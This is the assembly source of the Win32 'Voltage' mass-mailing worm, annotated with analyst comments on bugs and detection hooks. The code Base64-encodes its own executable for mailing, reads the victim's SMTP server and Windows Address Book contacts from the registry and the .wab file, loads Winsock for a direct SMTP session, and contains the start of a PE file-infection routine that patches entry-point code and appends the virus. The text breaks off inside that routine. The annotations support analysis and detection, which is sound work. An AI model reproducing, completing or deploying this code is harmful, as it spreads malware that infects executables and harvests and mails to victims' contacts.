?? i-worm_win32.voltage病毒源代碼.txt
rep movsb
jmp _____1
;-----------------------------------------------------------------------
; SendDropper - read an executable from disk and Base64-encode it into a
;               heap buffer.
;
; Two entry points:
;   SendDropper : fills wvltg_exe_path with GetModuleFileName(NULL,...),
;                 i.e. the path of the running image (the host the worm
;                 is attached to).
;   _____1      : entered by the `jmp _____1` above with wvltg_exe_path
;                 already filled by the caller (the preceding rep movsb);
;                 which path that is is not visible on this page.
; in:  ebp = relocation delta.  Every data reference on this page is
;      [ebp + label]: the worm runs appended to a host image at an
;      address it was not assembled for (see InfectFile below), so the
;      caller must have ebp set up before calling.
; out: base64outputmem = GlobalAlloc'd buffer holding the encoded file
;      sizeofbase64out = bytes written into it (CRLF line breaks included)
;      CF=1 on success; CF=0 on any failure (buffer freed on failure)
; Notes for analysis:
;   - the buffer is NOT freed on success; the caller owns it.  Next to
;     the SMTP/Winsock routines below this looks like the "attach self
;     to an outgoing mail" stage, but the send itself is not on this page.
;   - the source file is opened GENERIC_READ / FILE_SHARE_READ and only
;     mapped PAGE_READONLY; nothing is written to it here.
;-----------------------------------------------------------------------
SendDropper:
push 0ffh ;nSize = 255 = sizeof wvltg_exe_path
lea eax,[ebp + wvltg_exe_path]
push eax ;lpFilename
push 0h ;hModule = NULL -> path of the current process image
call [ebp + GetModuleFileName]
cmp eax,0h
je Base64CreationErr ;0 = failed; nothing acquired yet
_____1: ;open it (shared entry: wvltg_exe_path already filled)
push 0h ;hTemplateFile
push FILE_ATTRIBUTE_NORMAL ;dwFlagsAndAttributes
push OPEN_EXISTING ;dwCreationDisposition
push 0h ;lpSecurityAttributes
push FILE_SHARE_READ
push GENERIC_READ ;read-only; the file is never modified here
lea eax,[ebp + wvltg_exe_path]
push eax
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je Base64CreationErr
mov [ebp + hvirusfile],eax
;get file size (low dword only: lpFileSizeHigh = NULL)
push 0
push [ebp + hvirusfile]
call [ebp + GetFileSize]
cmp eax,0ffffffffh ;INVALID_FILE_SIZE
je CloseFileErr
mov [ebp + virusfilesize],eax
;output buffer size = (size + size/3) * 25 + 1024.
;Base64 only grows data by ~4/3 plus a CRLF every 76 chars, so this is
;an over-allocation by more than an order of magnitude.  The 32-bit mul
;would wrap for very large inputs; the size is never range-checked.
push eax ;save size
xor edx,edx ;edx:eax / ecx - edx must be zero before div
mov ecx,3h
div ecx ;eax = size/3
xchg ecx,eax ;ecx = size/3
pop eax ;eax = size
add eax,ecx ;eax = size + size/3
mov ecx,25
mul ecx ;eax = (size + size/3) * 25
add eax,400h ;+1024 bytes of slack
push eax ;dwBytes
push GPTR ;GMEM_FIXED | GMEM_ZEROINIT
call [ebp + GlobalAlloc] ;allocate memory
cmp eax,0h
je CloseFileErr
mov [ebp + base64outputmem],eax
;map the file into memory, read-only
xor eax,eax
push eax ;lpName = NULL
push eax ;dwMaximumSizeLow = 0 -> whole file
push eax ;dwMaximumSizeHigh = 0
push PAGE_READONLY
push eax ;lpAttributes = NULL
push dword ptr [ebp + hvirusfile]
call [ebp + CreateFileMapping]
cmp eax,0h
je B64FreeMemErr
mov [ebp + hvirusmap],eax
xor eax,eax
push eax ;dwNumberOfBytesToMap = 0 -> whole file
push eax ;dwFileOffsetLow
push eax ;dwFileOffsetHigh
push FILE_MAP_READ
push dword ptr [ebp + hvirusmap]
call [ebp + MapViewOfFile]
cmp eax,0h
je B64CloseMapErr
mov [ebp + hvirusinmem],eax
;Base64 contract (see below): esi = source, edi = destination,
;ecx = byte count; returns eax = encoded length
xchg eax,esi
mov edi,[ebp + base64outputmem]
mov ecx,[ebp + virusfilesize]
call Base64
mov [ebp + sizeofbase64out],eax
;release the view, the mapping and the file; keep the encoded buffer
push [ebp + hvirusinmem]
call [ebp + UnMapViewOfFile]
push [ebp + hvirusmap]
call [ebp + CloseHandle]
push [ebp + hvirusfile]
call [ebp + CloseHandle]
stc ;CF=1: success, base64outputmem/sizeofbase64out valid
ret
;error unwinding: each label falls through into the next, releasing
;resources in reverse order of acquisition
B64CloseMapErr:
push dword ptr [ebp + hvirusmap]
call [ebp + CloseHandle]
B64FreeMemErr:
push dword ptr [ebp + base64outputmem]
call [ebp + GlobalFree]
CloseFileErr:
push [ebp + hvirusfile]
call [ebp + CloseHandle]
Base64CreationErr:
clc ;CF=0: failure
ret
wvltg_exe_path db 0ffh dup(0) ;255-byte path buffer (matches nSize above)
hvirusfile dd 0 ;file handle
virusfilesize dd 0 ;GetFileSize result, low dword
base64outputmem dd 0 ;GlobalAlloc'd output buffer (caller frees)
sizeofbase64out dd 0 ;bytes of Base64 text produced
hvirusmap dd 0 ;file-mapping handle
hvirusinmem dd 0 ;mapped view base
;-----------------------------------------------------------------------
; Base64 - encode a byte buffer as Base64 text, CRLF after every 76 chars
;
; input:
;   esi - data source
;   edi - where to write encoded data (must be large enough; no bound check)
;   ecx - size of data to encode, in bytes
;   ebp - relocation delta (Base64Table is read via [ebp + Base64Table])
; output:
;   eax - size of encoded data, CRLF line breaks included
; clobbers: eax, ebx, ecx, edx, esi, edi, flags
;
; Behaviour worth knowing when handling output produced by this code:
;   - a CR LF (0Dh 0Ah) is written after every 76 output characters
;     (the RFC 2045 line limit) but only when more input follows; the
;     last line is never terminated.
;   - '=' padding is never emitted.  The bookkeeping (sub ecx,2 plus the
;     loop decrement = 3 per group, exit when fewer than 3 remain) does
;     not handle sizes that are not a multiple of 3: for inputs of 3
;     bytes or more the final byte is either dropped (size mod 3 = 1) or
;     one byte past the end is read and encoded (size mod 3 = 2).  With
;     ecx = 0 or 1 the check after the first group underflows and the
;     loop runs away.  The output is therefore not always a faithful
;     encoding of the input.
;-----------------------------------------------------------------------
Base64: xor edx,edx ;edx = characters on the current output line
push edx ;[esp] = running output byte count
@3Bytes:push edx ;save line counter (edx is clobbered by lea below)
xor eax,eax
xor ebx,ebx
or al,byte ptr [esi] ;eax = b0
shl eax,8h
inc esi
or al,byte ptr [esi] ;eax = b0 b1
shl eax,8h
inc esi
or al,byte ptr [esi] ;eax = b0 b1 b2 (24 bits, big-endian)
inc esi
push ecx ;save remaining input count
mov ecx,4h ;4 output chars per 3 input bytes
@outbit:mov ebx,eax
and ebx,3fh ;leave only 6 bits
lea edx,[ebp + Base64Table]
mov bl,byte ptr [ebx + edx] ;translate the 6-bit index
mov byte ptr [edi + ecx - 1h],bl ;filled last-to-first: lowest 6 bits -> 4th char
shr eax,6h
loop @outbit
pop ecx ;remaining input count
sub ecx,2h ;with the `loop` below this consumes 3 bytes per group
add edi,4h
pop edx ;restore line counter
add edx,4h
add dword ptr [esp],4h ;output count += 4
cmp ecx,3h
jb ExitB64 ;fewer than 3 bytes left: stop (no padding handling)
cmp edx,4ch ;76 chars on this line -> insert a line break
jne DoLoop
xor edx,edx
mov word ptr [edi],0a0dh ;little-endian word = bytes 0Dh 0Ah = CR LF
add edi,2h
add dword ptr [esp],2h ;output count += 2
DoLoop: loop @3Bytes
ExitB64:pop eax ;eax = total bytes written
ret
Base64Table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;standard alphabet
;-----------------------------------------------------------------------
; GetSMTPServer - read the victim's default outgoing (SMTP) mail server
;                 from the Internet Account Manager registry store (the
;                 key Outlook Express keeps its accounts under).
;
; Registry walk, all under HKEY_CURRENT_USER:
;   Software\Microsoft\Internet Account Manager
;       value "Default Mail Account"                  -> accountnum
;   Software\Microsoft\Internet Account Manager\Accounts\<accountnum>
;       value "SMTP Server"                           -> SmtpServerAdd
; in:  ebp = relocation delta
; out: SmtpServerAdd = server name; CF=1 on success, CF=0 on failure
; clobbers: eax, hkey, accountkey (appended to, never reset)
; Notes for analysis:
;   - the first RegOpenKeyEx passes samDesired = 0; the second KEY_READ.
;   - the second RegOpenKeyEx stores its result in the same hkey variable
;     that holds the parent key, so the parent handle is overwritten and
;     never closed - leaked on the success path and on the last error
;     path.
;   - SizeOfAccountNum / SizeOfSMTPServerAdd are in/out: RegQueryValueEx
;     overwrites them with the returned length and nothing resets them,
;     so a second call would see the shrunk sizes.
;   - detection hook: a process that is not a mail client reading these
;     two values.
;-----------------------------------------------------------------------
GetSMTPServer:
;get the default smtp server from the registry
mov dword ptr [ebp + hkey],0h
lea eax,[ebp + hkey]
push eax ;phkResult
xor eax,eax
push eax ;samDesired = 0
push eax ;ulOptions = 0
lea eax,[ebp +smtp_key]
push eax ;"Software\Microsoft\Internet Account Manager"
push HKEY_CURRENT_USER
call [ebp + RegOpenKeyEx]
cmp eax,ERROR_SUCCESS
jne SmtpGetErr
lea eax,[ebp + SizeOfAccountNum]
push eax ;lpcbData (in/out)
lea eax,[ebp + accountnum]
push eax ;lpData
xor eax,eax
push eax ;lpType = NULL
push eax ;lpReserved
lea eax,[ebp + default_mail]
push eax ;"Default Mail Account"
push dword ptr [ebp + hkey]
call [ebp + RegQueryValueEx]
cmp eax,ERROR_SUCCESS
jne CloseKeyErr
;accountkey = "Accounts\" + accountnum
;(accountnum is at most 74 chars + NUL, which fits the 9 + 75 byte buffer)
lea eax,[ebp + accountnum]
push eax
lea eax,[ebp + accountkey]
push eax
call [ebp + lstrcat]
cmp eax,0h
je CloseKeyErr
lea eax,[ebp + hkey]
push eax ;phkResult - overwrites the parent handle (leaked, see header)
push KEY_READ
push 0h
lea eax,[ebp + accountkey]
push eax ;"Accounts\<accountnum>"
push dword ptr [ebp + hkey] ;parent key
call [ebp + RegOpenKeyEx]
cmp eax,ERROR_SUCCESS
jne CloseKeyErr
lea eax,[ebp + SizeOfSMTPServerAdd]
push eax ;lpcbData (in/out)
lea eax,[ebp + SmtpServerAdd]
push eax ;lpData
xor eax,eax
push eax ;lpType = NULL
push eax ;lpReserved
lea eax,[ebp + smtp_server]
push eax ;"SMTP Server"
push dword ptr [ebp + hkey]
call [ebp + RegQueryValueEx]
cmp eax,ERROR_SUCCESS
jne CloseKeyErr
push dword ptr [ebp + hkey] ;closes only the Accounts\<id> key
call [ebp + RegCloseKey]
stc ;CF=1: SmtpServerAdd is valid
ret
CloseKeyErr:
push dword ptr [ebp + hkey]
call [ebp + RegCloseKey]
SmtpGetErr:
clc ;CF=0: failure
ret
smtp_key db "Software\Microsoft\Internet Account Manager",0
default_mail db "Default Mail Account",0
smtp_server db "SMTP Server",0
SmtpServerAdd db 75 dup(0) ;output: SMTP server name
SizeOfSMTPServerAdd dd 75 ;in/out byte count for RegQueryValueEx
accountnum db 75 dup(0) ;"Default Mail Account" value
SizeOfAccountNum dd 75 ;in/out byte count for RegQueryValueEx
accountkey db "Accounts\",75 dup(0) ;subkey name built by lstrcat
;-----------------------------------------------------------------------
; GetWinsockApis - LoadLibrary("ws2_32.dll") and resolve the nine socket
;                  functions listed below by name into
;                  winsock_functions_addresses.
;
; in:  ebp = relocation delta
; out: hWinsock = module handle; address table filled by get_apis;
;      CF=0 if LoadLibrary fails.  On the success path CF is whatever
;      get_apis (not on this page) leaves - nothing here sets it.
; get_apis register contract as used here: edx = module handle,
;      ecx = entry count, eax = name table, ebx = address table.
; Notes for analysis:
;   - imports are resolved at run time by name rather than through an
;     import table, as expected for code appended to a host binary that
;     has no IAT of its own.
;   - the set (WSAStartup, socket, gethostbyname, connect, send, recv,
;     htons, closesocket, WSACleanup) is the minimum for a hand-rolled
;     TCP client; with GetSMTPServer above this points at a direct SMTP
;     session, though the protocol code is not on this page.
;-----------------------------------------------------------------------
GetWinsockApis:
lea eax,[ebp + WinsockDll]
push eax
call [ebp + LoadLibrary]
cmp eax,0h
je GetWinsockApisErr
mov dword ptr [ebp + hWinsock],eax
xchg eax,edx ;edx = module handle
mov ecx,NumberOfWinsockFunctions ;9 entries
lea eax,[ebp + winsock_functions_sz] ;NUL-separated name list
lea ebx,[ebp + winsock_functions_addresses] ;parallel dd table
call get_apis ;defined elsewhere in the file
ret
GetWinsockApisErr:
clc ;CF=0: ws2_32.dll could not be loaded
ret
WinsockDll db "ws2_32.dll",0
hWinsock dd 0 ;module handle from LoadLibrary
;name table: consecutive NUL-terminated strings in the same order as the
;address table below; NumberOfWinsockFunctions must match both
winsock_functions_sz:
_WSAStartup db "WSAStartup",0
_WSACleanup db "WSACleanup",0
_socket db "socket",0
_gethostbyname db "gethostbyname",0
_connect db "connect",0
_recv db "recv",0
_send db "send",0
_htons db "htons",0
_closesocket db "closesocket",0
;address table: filled by get_apis, called through [ebp + name] elsewhere
winsock_functions_addresses:
WSAStartup dd 0
WSACleanup dd 0
socket dd 0
gethostbyname dd 0
connect dd 0
recv dd 0
send dd 0
htons dd 0
closesocket dd 0
NumberOfWinsockFunctions equ 9
;-----------------------------------------------------------------------
; ScanWAB - harvest e-mail addresses from the Windows Address Book
;
; Steps:
;   1. HKCU\Software\Microsoft\WAB\WAB4\Wab File Name, default value
;      (lpValueName = NULL) -> WAB_Path
;   2. open and map the .wab file read-only
;   3. word at file offset 64h = entry count; dword at offset 60h =
;      offset of the first entry (the layout this code assumes; it is
;      not validated anywhere here)
;   4. copy every entry into a GlobalAlloc'd buffer as packed
;      NUL-terminated single-byte strings
; in:  ebp = relocation delta
; out: hMailAddresses = the buffer (never freed here; caller owns it)
;      NumberOfMailAddresses = entry count from the file header
;      no stc/clc on any path - the caller can only test the outputs,
;      which are left unchanged on failure
; clobbers: eax, ebx, ecx, edx, hkey
; Notes for analysis:
;   - entry count must be > 1 (cmp ax,1 / jnbe): a one-entry address
;     book is treated as empty.
;   - allocation size = count * 68 via a 16-bit mul; only ax is kept
;     and dx is discarded, so more than 963 entries wraps the size while
;     the copy loop still runs for the full count - a heap overrun on
;     large address books.
;   - the copy takes every second source byte (add eax,2), presumably
;     narrowing 16-bit characters to their low byte, and ecx drops by
;     two per character (dec ecx + loop), so at most 34 characters of
;     each entry are kept.
;   - source reads are never bounded by the mapped file size; a short
;     or crafted .wab file is read past its end.
;   - the terminator between entries is the zero byte left by GPTR; the
;     explicit store at MovNext lands one byte further on and is
;     overwritten by the next entry's first character.
;   - detection hook: a process other than a mail client reading this
;     registry value and then opening the .wab file.
;-----------------------------------------------------------------------
ScanWAB: ;scan the windows address book for email addresses
mov dword ptr [ebp + hkey],0h
lea eax,[ebp + hkey]
push eax ;phkResult
xor eax,eax
push eax ;samDesired = 0
push eax ;ulOptions
lea eax,[ebp + WAB_Location]
push eax ;"Software\Microsoft\WAB\WAB4\Wab File Name"
push HKEY_CURRENT_USER
call [ebp + RegOpenKeyEx]
cmp eax,ERROR_SUCCESS
jne WabScanErr
lea eax,[ebp + SizeOfWAB_PATH]
push eax ;lpcbData (in/out, not reset between calls)
lea eax,[ebp + WAB_Path]
push eax ;lpData
xor eax,eax
push eax ;lpType
push eax ;lpReserved
push eax ;lpValueName = NULL -> the key's default value
push [ebp + hkey]
call [ebp + RegQueryValueEx] ;get the wab file location
cmp eax,ERROR_SUCCESS
jne CloseWABkeyAndExit
push dword ptr [ebp + hkey]
call [ebp + RegCloseKey]
;open the wab file read-only (nothing is written to it):
xor eax,eax
push eax ;hTemplateFile
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax ;lpSecurityAttributes
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[ebp + WAB_Path]
push eax
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je WabScanErr
mov dword ptr [ebp + hWabFile],eax
;map the wab file :
xor eax,eax
push eax ;lpName
push eax ;dwMaximumSizeLow = 0 -> whole file
push eax ;dwMaximumSizeHigh
push PAGE_READONLY
push eax ;lpAttributes
push dword ptr [ebp + hWabFile]
call [ebp + CreateFileMapping]
cmp eax,0h
jne MapWab
ErrCMF: push dword ptr [ebp + hWabFile] ;error close wab file
call [ebp + CloseHandle]
jmp WabScanErr
MapWab: mov [ebp + hWabMap],eax
xor eax,eax
push eax ;dwNumberOfBytesToMap = 0 -> whole file
push eax ;dwFileOffsetLow
push eax ;dwFileOffsetHigh
push FILE_MAP_READ
push dword ptr [ebp + hWabMap]
call [ebp + MapViewOfFile]
cmp eax,0h
jne ReadAddresses
ErrCWM: push dword ptr [ebp + hWabMap] ;error close wab map
call [ebp + CloseHandle]
jmp ErrCMF
ReadAddresses:
mov [ebp + hWabMapBase],eax
mov ax,word ptr [eax + 64h] ;get number of email addresses (header word, unvalidated)
cmp ax,1h
jnbe AllocAddMem ;continue only if count > 1
ErrUWF: push dword ptr [ebp + hWabMapBase] ;error unmap wab file
call [ebp + UnMapViewOfFile]
jmp ErrCWM
AllocAddMem:
mov word ptr [ebp + NumberOfMailAddresses],ax
mov cx,44h ;every mail address allocated 68 bytes
mul cx ;dx:ax = count * 68; dx is dropped below (wraps above 963 entries)
xor ebx,ebx
xchg ax,bx ;ebx = low 16 bits of the size only
push ebx ;dwBytes
push GPTR ;zero-initialised: the copy loop relies on this for its NULs
call [ebp + GlobalAlloc]
cmp eax,0h
je ErrUWF
mov [ebp + hMailAddresses],eax
xchg eax,ebx ;ebx = write cursor into the new buffer
xor ecx,ecx
mov eax,[ebp + hWabMapBase]
mov cx,word ptr [ebp + NumberOfMailAddresses] ;ecx = entries left
add eax,[eax + 60h] ;goto start of emails (eax = read cursor; no bound vs file size)
NxtMail:push ecx ;save outer count
mov ecx,44h ;per-entry budget (effectively 34 chars, see dec below)
CpyMail:cmp byte ptr [eax],0h
je MovNext ;NUL ends the entry
mov dl,byte ptr [eax]
mov byte ptr [ebx],dl
inc ebx
add eax,2h ;skip one source byte per character
dec ecx ;ecx falls by 2 per character together with the loop
loop CpyMail
MovNext:add eax,ecx ;advance source by the unused budget (record layout assumed)
inc ebx ;step over the zero byte that terminates this string
mov byte ptr [ebx],0h ;overwritten by the next entry's first character
pop ecx
loop NxtMail
push dword ptr [ebp + hWabMapBase]
call [ebp + UnMapViewOfFile]
push dword ptr [ebp + hWabMap]
call [ebp + CloseHandle]
push dword ptr [ebp + hWabFile]
call [ebp + CloseHandle]
ret ;success: hMailAddresses / NumberOfMailAddresses set
CloseWABkeyAndExit:
push dword ptr [ebp + hkey]
call [ebp + RegCloseKey]
WabScanErr:
ret ;failure: outputs unchanged, no flag set
WAB_Location db "Software\Microsoft\WAB\WAB4\Wab File Name",0
WAB_Path db 0ffh dup(0) ;path read from the registry
SizeOfWAB_PATH dd 0ffh ;in/out byte count for RegQueryValueEx
hWabFile dd 0 ;file handle
hWabMap dd 0 ;file-mapping handle
hWabMapBase dd 0 ;mapped view base
hMailAddresses dd 0 ;GlobalAlloc'd packed string list (caller frees)
NumberOfMailAddresses dw 0 ;entry count from the .wab header
;-----------------------------------------------------------------------
; ExecuteFile - CreateProcess(FileToInfect, CommandLine, ..., FileDirectory)
;
; Starts the program named in FileToInfect (FileToInfect, CommandLine and
; FileDirectory are defined elsewhere in the file) with this process'
; own STARTUPINFO, no inherited handles, no creation flags, the default
; environment and FileDirectory as the working directory.
; in:  ebp = relocation delta
; out: eax = CreateProcess result (non-zero = started); not mapped to CF.
;      hprocess / hthread receive the new handles; they are not closed
;      in this routine.
; Given the buffer name this is presumably how the worm launches the
; original host program after infecting it; the caller is not on this
; page.
;-----------------------------------------------------------------------
ExecuteFile:
mov dword ptr [ebp + cb],SizeOfStartupinfo ;STARTUPINFO.cb must be set first
lea eax,[ebp + Startupinfo]
push eax
call [ebp + GetStartupInfo] ;copy this process' startup info (desktop, std handles, show state)
lea eax,[ebp + Process_Information]
push eax ;lpProcessInformation
lea eax,[ebp + Startupinfo]
push eax ;lpStartupInfo
lea eax,[ebp + FileDirectory]
push eax ;lpCurrentDirectory
xor eax,eax
push eax ;lpEnvironment = NULL
push eax ;dwCreationFlags = 0
push eax ;bInheritHandles = FALSE
push eax ;lpThreadAttributes = NULL
push eax ;lpProcessAttributes = NULL
lea eax,[ebp + CommandLine]
push eax ;lpCommandLine
lea eax,[ebp + FileToInfect]
push eax ;lpApplicationName
call [ebp + CreateProcess]
ret
;PROCESS_INFORMATION, 4 dwords = 16 bytes
Process_Information:
hprocess dd 0
hthread dd 0
dwprocessid dd 0
dwthreadid dd 0
;STARTUPINFOA laid out field by field (68 bytes); SizeOfStartupinfo is
;computed from it and stored into cb above
Startupinfo:
cb dd 0
lpReserved dd 0
lpDesktop dd 0
lpTitle dd 0
dwX dd 0
dwY dd 0
dwXSize dd 0
dwYSize dd 0
dwXCountChars dd 0
dwYCountChars dd 0
dwFillAttribute dd 0
dwFlags dd 0
wShowWindow dw 0
cbReserved2 dw 0
lpReserved2 dd 0
hStdInput dd 0
hStdOutput dd 0
hStdError dd 0
SizeOfStartupinfo equ $-Startupinfo
InfectFile:
;*********************Debug C0de*******************************
IF DEBUG
push MB_YESNO
lea eax,[ebp + warning]
push eax
lea eax,[ebp + FileToInfect]
push eax
push 0h
call [ebp + MessageBox]
cmp eax,IDYES
jne ExitInfect
ENDIF
;**************************************************************
call CheckFileName
jnc ExitInfect
clc
call CheckSFPFile
jnc ExitInfect
call RemoveFileAttributes
call OpenFile
jnc ExitInfect
mov eax,[ebp + mapbase]
cmp word ptr [eax],"ZM" ;check mz sign
jne ExitWithoutInfection
add eax,[eax + 3ch]
cmp word ptr [eax],"EP" ;check pe sign
jne ExitWithoutInfection
push eax ;save pe header offset in the stack
mov cx,word ptr [eax + 16h] ;get flags
and cx,2000h
cmp cx,2000h ;is dll ?
jne nodll ;infect only executeables
pop eax ;restore stack
jmp ExitWithoutInfection
nodll: mov ecx,[eax + 34h] ;get image base
mov [ebp + ProgramImageBase],ecx ;save image base
movzx ecx,word ptr [eax + 6h] ;get number of sections
mov ebx,[eax + 74h]
shl ebx,3h
add eax,ebx
add eax,78h ;goto first section header
@nexts: mov ebx,[eax + 24h] ;get section flags
and ebx,20h
cmp ebx,20h ;is code section ?
je FoundCS
add eax,28h
loop @nexts
pop eax ;restore stack
jmp ExitWithoutInfection
FoundCS:mov ebx,[eax + 10h] ;get section size of raw data
sub ebx,[eax + 8h]
cmp ebx,0beh ;check for minimum decryptor size
ja ____1
pop eax ;restore stack
jmp ExitWithoutInfection
____1: mov ecx,[eax + 8h] ;get section vitrual size
mov ebx,ecx ;get section virtual size
add ebx,[eax + 14h] ;add to it pointer raw data rva
add ebx,[ebp + mapbase] ;convert it to va
mov [ebp+WhereToWriteDecryptor],ebx ;set where to write decryptor
mov ebx,dword ptr [esp] ;get pe header
push eax ;save pointer to code section header
push ecx ;save size of code section
mov eax,[ebx + 28h] ;get entry point rva
add eax,[ebp + mapbase] ;convert it to va
mov ecx,64h ;100 bytes
call ScanAndPatch ;try to patch instruction that close to EP first
jnc patch2 ;if fail try some other thing...
add esp,8h ;restore stack
jmp ____2
patch2: mov ecx,64h ;100 bytes
mov eax,[esp + 8h] ;get pe header
mov eax,[eax + 28h] ;get program entry point rva
add eax,[ebp + mapbase] ;convert it to va
sub eax,0c00h ;it work with some programs :)
call ScanAndPatch
jnc all_sec ;if we fail scan all code section
add esp,8h ;restore stack
jmp ____2
all_sec:pop ecx ;restore size of code section
pop eax ;restore pointer to code section header
mov eax,[eax + 14h]
add eax,[ebp + mapbase] ;goto section raw data
call ScanAndPatch
jc ____2
pop eax ;restore stack
jmp ExitWithoutInfection
____2: mov eax,dword ptr [esp] ;get pe header
xor ecx,ecx
mov cx,word ptr [eax + 6h] ;get number of sections
dec ecx
mov ebx,[eax + 74h]
shl ebx,3h
add eax,ebx
add eax,78h
@nexts2:add eax,28h
loop @nexts2 ;goto last section header
or [eax + 24h],0C0000000h ;set section flags to readable\writeable
add dword ptr [eax + 8h],VirusSize ;add virus size to section virtual size
xchg eax,ebx
mov eax,[ebx + 8h] ;get section new virtual size
mov ecx,dword ptr [esp] ;get pe header
mov ecx,[ecx + 3ch] ;get file alignment